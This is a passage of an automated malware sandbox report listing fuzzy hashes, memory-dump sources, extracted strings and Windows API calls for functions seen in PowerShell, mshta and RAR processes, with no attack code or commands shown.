Opcode Fuzzy Hash: 642f1549dc4751e7fe58720763946cd7e2601a86074024aaa4af1ce39cd620a4
Instruction Fuzzy Hash: D8112932D0DBC68FEBA5EB2C94505B4BBD0FF017A4B4901FAC08DDB096DA18AC45CB41

Function 00007FF8461467F5 Relevance: .4, Instructions: 430COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2253409359.00007FF846140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff846140000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c3bcacec053f2e448cb7579d9ffa40b37ff50ad750722a07feabdfc08385165
Instruction ID: 213e0b44bd3e105e7583f255154788036d058594c8445e372069cd67227f2093
Opcode Fuzzy Hash: 5c3bcacec053f2e448cb7579d9ffa40b37ff50ad750722a07feabdfc08385165
Instruction Fuzzy Hash: 41D15931E0EB8A9FE795AB2898155B5BBE0FF06794B1801FED04DC71D3DA18AC05CB91

Function 00007FF846144253 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2253409359.00007FF846140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff846140000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c37f89a2635560a6678bf883adc0b3aad2d7cca79f6ef222c936605dc76cbd3
Instruction ID: ed7d55a51898a99477523652478dfc56b2b2ea11fd19724591edc1648e662d7a
Opcode Fuzzy Hash: 2c37f89a2635560a6678bf883adc0b3aad2d7cca79f6ef222c936605dc76cbd3
Instruction Fuzzy Hash: D4510632E0DB968FE7A9EA2C6411674B7E2FF856A4F5901BAC04EC7193DE24EC058741

Function 00007FF845F5E380 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2252218848.00007FF845F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF845F5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff845f5d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7cd9ac22c72c80b881e4cdab7299d319bcef34ea5716f7b5672b21ae0d13a7a
Instruction ID: e643146644208273dfcbcb94448c1ced80b1a538e765056c5e0eaffa0f4b1c4e
Opcode Fuzzy Hash: e7cd9ac22c72c80b881e4cdab7299d319bcef34ea5716f7b5672b21ae0d13a7a
Instruction Fuzzy Hash: 2641257180DBC84FE7569B2898459627FF0EF52360B1501EFD188CF1E3DA25A846C793

Function 00007FF846079880 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2252842050.00007FF846070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff846070000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87798ebea7b6a29ad14e450fda55ac2b5dee7eefd37a6ce91dde202fa1bec032
Instruction ID: 27d17cdf3f66dd0d483d3fbe1a1a870d8bf9a2d623745346ac56615f19b83388
Opcode Fuzzy Hash: 87798ebea7b6a29ad14e450fda55ac2b5dee7eefd37a6ce91dde202fa1bec032
Instruction Fuzzy Hash: 4531E93191CB484FDB589F5C9C466B9BBF0FBA9711F00426FD449D3252CA71A855CBC2

Function 00007FF84607BD8D Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2252842050.00007FF846070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff846070000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e84927f7e112c8fc78b142a72261bdbf013b3cd81c819eb47d76c03e7e96aea
Instruction ID: bd2949b396229a539f2245c4fffc22e73debd1ea4e8af83e87e52263621df5b4
Opcode Fuzzy Hash: 6e84927f7e112c8fc78b142a72261bdbf013b3cd81c819eb47d76c03e7e96aea
Instruction Fuzzy Hash: F731B27190CB488FDB59DF6C9C496E9BBF0EF66324F04416BD488C7152D624A41ACB92

Function 00007FF84614429F Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2253409359.00007FF846140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff846140000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a97b7ef00f820c2375f5605dcaa2d8d7486162472f31c9dee09e5caf5c8cf7
Instruction ID: 7e729e0def9be9c3e2890f043c1eb39f8757935e509aa299b2e4372e998b56eb
Opcode Fuzzy Hash: f8a97b7ef00f820c2375f5605dcaa2d8d7486162472f31c9dee09e5caf5c8cf7
Instruction Fuzzy Hash: 6821F632E0DB978FE7A9EA2C6450674A3D1FF447A8B5901BAC04EC71D3CE28EC008B41

Function 00007FF8460733B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2252842050.00007FF846070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff846070000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 9e76af21bce58cfd366eff7dbaedbf5c8f5e799c4dac718acbfc6f4453a67cdb
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 8301677151CB0C4FDB48EF0CE451AA5B7E0FB95364F10056DE58AC7691DA36E882CB45

Function 00007FF84607A1FB Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2252842050.00007FF846070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff846070000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 916e9e9653924fc8e182d8e713a4e24dc4e004c88d36778cbab07bc2e4b05d73
Instruction ID: d0b3215e487c1d387b7c3a66a1f9abd5a0600d5c497e186e000b9c4556e15d16
Opcode Fuzzy Hash: 916e9e9653924fc8e182d8e713a4e24dc4e004c88d36778cbab07bc2e4b05d73
Instruction Fuzzy Hash: 07F0227690CA8D8FDB55EF2CD8654E9BFE0FFB6352B0401ABD549C7061D6215809CB81

Non-executed Functions

Function 00007FF846078BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

N_^J, xrefs: 00007FF846078C7A
N_^F, xrefs: 00007FF846078C6A
N_^I, xrefs: 00007FF846078C72
N_^6, xrefs: 00007FF846078BFA
N_^<, xrefs: 00007FF846078C2A

Memory Dump Source

Source File: 0000000E.00000002.2252842050.00007FF846070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff846070000_powershell.jbxd

Similarity

API ID:
String ID: N_^6$N_^<$N_^F$N_^I$N_^J
API String ID: 0-4116931533
Opcode ID: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
Instruction ID: 8d26d588b44ff948662edfe4bee3202119ab881efda5d81b2ffc5b77bc3a3794
Opcode Fuzzy Hash: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
Instruction Fuzzy Hash: 3E21F3AB709566AFD30177ADBC515D86780DB966B674801B3D358CF903E91460CB87C1

Function 00007FF8460786FA Relevance: 6.3, Strings: 5, Instructions: 95COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FF8460786FA
N_^, xrefs: 00007FF846078712
N_^, xrefs: 00007FF846078772
N_^, xrefs: 00007FF846078722
N_^, xrefs: 00007FF8460787C2

Memory Dump Source

Source File: 0000000E.00000002.2252842050.00007FF846070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff846070000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^$N_^
API String ID: 0-1162251571
Opcode ID: 82b2251615890c69119d15616de730def3d4c9030800ac1adcb2a501efb8fdbc
Instruction ID: 9d32c09a01079ecf0edbf38fd76e127e2b512071229f1e7a4c161061fd5491c4
Opcode Fuzzy Hash: 82b2251615890c69119d15616de730def3d4c9030800ac1adcb2a501efb8fdbc
Instruction Fuzzy Hash: DD31E4F3D0EBC65FE76A66785CB90A57FD0EF226A9B0900F6C4959F093FD1464068202

Function 00007FF846078955 Relevance: 5.2, Strings: 4, Instructions: 151COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FF846078AC2
N_^, xrefs: 00007FF846078A7A
N_^, xrefs: 00007FF8460789C9
N_^, xrefs: 00007FF846078A2A

Memory Dump Source

Source File: 0000000E.00000002.2252842050.00007FF846070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff846070000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: cf03daf4439dadf00e0f390ad5885e85579cb6a4355d2f846d078805ada1ff05
Instruction ID: 90876b44f534a7b077a6849686ed16befdcb1ad20740fa8318bf185c727e4be4
Opcode Fuzzy Hash: cf03daf4439dadf00e0f390ad5885e85579cb6a4355d2f846d078805ada1ff05
Instruction Fuzzy Hash: BC4193A2E0E6C35FFB6A56394C79155BFA0FF726A9B0D01F6C0859F0D3E91928078712

Analysis Process: mshta.exePID: 5396, Parent PID: 6640COMMON

Executed Functions

Function 000001DBE0090FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000003.2146465663.000001DBE0090000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001DBE0090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_1dbe0090000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: d67050cccc73c119d8949b23228f92c1a75419e0f5cf3b33dd9fa9f61ccdc7dc
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: FF90021549941A99D42411D10C952DC614063C8350FD54495441791585D64D03965152

Analysis Process: powershell.exePID: 3560, Parent PID: 8024COMMON

Executed Functions

Function 00007FF8460A4DD3 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.2323726066.00007FF8460A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8460A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff8460a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15ba4412952e8aa527a34a7c29a7c687a10a03d23d555c403451d5a64f6eb6eb
Instruction ID: e7e5eca3821664f4efdfea54643bd93f4caa760636fc7b01701de8965d1958db
Opcode Fuzzy Hash: 15ba4412952e8aa527a34a7c29a7c687a10a03d23d555c403451d5a64f6eb6eb
Instruction Fuzzy Hash: EE71D435E0CB498FEB45EB6CD8916ACBBF1FF5A350F14416ED049E7292CA35A842CB41

Function 00007FF846171863 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.2324281601.00007FF846170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff846170000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4b7815d58da9778e1134f7b227bc70031a480b7268f099e185dfe0e707702e4
Instruction ID: c8ac2539ff23e26025347ea6c2ac5b82086ad4fdc4e0e19eed987ecb655c86c8
Opcode Fuzzy Hash: c4b7815d58da9778e1134f7b227bc70031a480b7268f099e185dfe0e707702e4
Instruction Fuzzy Hash: A5411B32B1CE494FE799AA2C64522F9B3E2EF957B1B5C017EC10EC71C3ED19A8468641

Function 00007FF846171AEE Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.2324281601.00007FF846170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff846170000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0658fb0bf540465deeee5291e197f814bd8f3ce1a9f66f2c8f0de145a6b40057
Instruction ID: 70c64eb5ca5247b283541bb9f3ff8cb4bb6d7883b73637b997710384d3f94d8d
Opcode Fuzzy Hash: 0658fb0bf540465deeee5291e197f814bd8f3ce1a9f66f2c8f0de145a6b40057
Instruction Fuzzy Hash: 6141FC32F0DA594FEBA5A62854525F9B3E1EF447A2B5C41BAC40DC72C7FD18B8018741

Function 00007FF8460A3945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.2323726066.00007FF8460A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8460A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff8460a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: c29b37a257e937936dc1d27c50b6fffa60713d567443325d460410e062f4e434
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: C901677151CB0C4FDB48EF0CE451AA5B7E0FB95364F10056DE58AC7651DA36E881CB45

Non-executed Functions

Function 00007FF8460A5D80 Relevance: 5.0, Strings: 4, Instructions: 38COMMON

Download Yara Rule

Strings

8f2F, xrefs: 00007FF8460A5DA1
(f2F, xrefs: 00007FF8460A5D91
Xf2F, xrefs: 00007FF8460A5DC1
Hf2F, xrefs: 00007FF8460A5DB1

Memory Dump Source

Source File: 0000002F.00000002.2323726066.00007FF8460A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8460A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff8460a0000_powershell.jbxd

Similarity

API ID:
String ID: (f2F$8f2F$Hf2F$Xf2F
API String ID: 0-2845594354
Opcode ID: 909523be92732ed3fca1c23d8fcf971d305cb7cffea69033a49250057e73a1ff
Instruction ID: a86819d140536e88ac84be352ed6f0921f0a489b33d3ffb654027c92472c4274
Opcode Fuzzy Hash: 909523be92732ed3fca1c23d8fcf971d305cb7cffea69033a49250057e73a1ff
Instruction Fuzzy Hash: 28F08956E1FAC24FF676062C3C991798791FF519B8A1503FBC044531CF5865DC0A8640

Analysis Process: rar.exePID: 7200, Parent PID: 7972COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	1218
Total number of Limit Nodes:	32

Executed Functions

Function 00007FF754241884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON

Download Yara Rule

Strings

%s%s , xrefs: 00007FF754242A46
sfx, xrefs: 00007FF754241884
rar, xrefs: 00007FF7542418AA
q:, xrefs: 00007FF7542419DA
.ext, xrefs: 00007FF7542418C0
,6, xrefs: 00007FF754242F83
BK, xrefs: 00007FF7542419C5
exe, xrefs: 00007FF754241897

Memory Dump Source

Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true

Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd

Similarity

API ID:
String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
API String ID: 0-1660254149
Opcode ID: 14afee9f14b9eaff1e48b0d421ac562d9ccd6413f16e33708596e859f96beb8d
Instruction ID: 0e4de8aab5a183fe0aee8838e6cb5b3edf49623b911d34d3da460f238eb7dd49
Opcode Fuzzy Hash: 14afee9f14b9eaff1e48b0d421ac562d9ccd6413f16e33708596e859f96beb8d
Instruction Fuzzy Hash: 22E2C232A08AE285EB24EF27D4A42FDB7A1FB45788F894035CA4D47796DF3AD544C720

Function 00007FF7542848CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF754284AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF75425CC90), ref: 00007FF754284AF5

GetModuleFileNameW.KERNEL32(?,?,?,00007FF754277E7D), ref: 00007FF75428492E
GetVersionExW.KERNEL32(?,?,?,00007FF754277E7D), ref: 00007FF75428496A
LoadLibraryExW.KERNELBASE(?,?,?,00007FF754277E7D), ref: 00007FF754284993
LoadLibraryW.KERNEL32(?,?,?,00007FF754277E7D), ref: 00007FF75428499F

Strings

rarlng.dll, xrefs: 00007FF75428493A

Memory Dump Source

Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true

Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd

Similarity

API ID: Library$Load$FileFreeModuleNameVersion
String ID: rarlng.dll
API String ID: 2520153904-1675521814
Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
Instruction ID: f78f327dc8e27511a9ed7850c5d6bc1cff7bd15e197ea1ccce9d6fc67776453a
Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
Instruction Fuzzy Hash: EB313432618B6286FB64EF22D8A02EDB764FB45784FC84035E94D43694EF3ED555C720

Function 00007FF7542646EC Relevance: 7.6, APIs: 5, Instructions: 99
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF754264620,?,00000000,?,00007FF754287A8C), ref: 00007FF754264736
FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF754264620,?,00000000,?,00007FF754287A8C), ref: 00007FF75426476B
GetLastError.KERNEL32(?,00000000,?,?,00007FF754264620,?,00000000,?,00007FF754287A8C), ref: 00007FF75426477A
FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF754264620,?,00000000,?,00007FF754287A8C), ref: 00007FF7542647A4
GetLastError.KERNEL32(?,00000000,?,?,00007FF754264620,?,00000000,?,00007FF754287A8C), ref: 00007FF7542647B2

Memory Dump Source

Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true

Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
Instruction ID: 2e96f47680370fba962d3756f8d4cb04f02d37bbb433f5249bf4735dddb35ff9
Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
Instruction Fuzzy Hash: 3E41D732708A91A6EA25AF26E4902E8B360FB497B4F840331EABD437C5DF6DD5558710

Function 00007FF75424B540 Relevance: 2.0, APIs: 1, Instructions: 490COMMON

Download Yara Rule

APIs

CharToOemA.USER32 ref: 00007FF75424B900

Memory Dump Source

Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true

Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd

Similarity

API ID: Char
String ID:
API String ID: 751630497-0
Opcode ID: ef7c9165b4ea038a72c4a70b654b31603e9aaa745bc893fac2e55cf26434fa8d
Instruction ID: 00018e6d9032bbdc84a2e291077ddf2e22cc3e538a8a348475c08194709e80e2
Opcode Fuzzy Hash: ef7c9165b4ea038a72c4a70b654b31603e9aaa745bc893fac2e55cf26434fa8d
Instruction Fuzzy Hash: A722C532E086A295E714EF32D4A41FDFBA0FB50758F8C8031DA4D87699DE7AE941C760

Function 00007FF754284774 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF75428495D,?,?,?,00007FF754277E7D), ref: 00007FF7542847DB
RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF75428495D,?,?,?,00007FF754277E7D), ref: 00007FF754284831
ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF75428495D,?,?,?,00007FF754277E7D), ref: 00007FF754284853
RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF75428495D,?,?,?,00007FF754277E7D), ref: 00007FF7542848A6

Strings

LanguageFolder, xrefs: 00007FF754284806
Software\WinRAR\General, xrefs: 00007FF7542847CD

Memory Dump Source

Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true

Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd

Similarity

API ID: CloseEnvironmentExpandOpenQueryStringsValue
String ID: LanguageFolder$Software\WinRAR\General
API String ID: 1800380464-3408810217
Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
Instruction ID: 614674e6fb213889dd8a2481820b0b8c32db1da09baae30b932bb1ebd4ac26ff
Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
Instruction Fuzzy Hash: FE31C322B18B9141FB60EF62E8A02BEA350FF88794F844231EE4D47B99EF6DD544C710

Function 00007FF754262574 Relevance: 7.6, APIs: 5, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 00007FF7542625B0
WriteFile.KERNEL32 ref: 00007FF7542625F9
WriteFile.KERNELBASE ref: 00007FF75426262E
GetLastError.KERNEL32 ref: 00007FF754262658
SetLastError.KERNEL32 ref: 00007FF754262689

Memory Dump Source

Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true

Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd

Similarity

API ID: ErrorFileLastWrite$Handle
String ID:
API String ID: 3350704910-0
Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
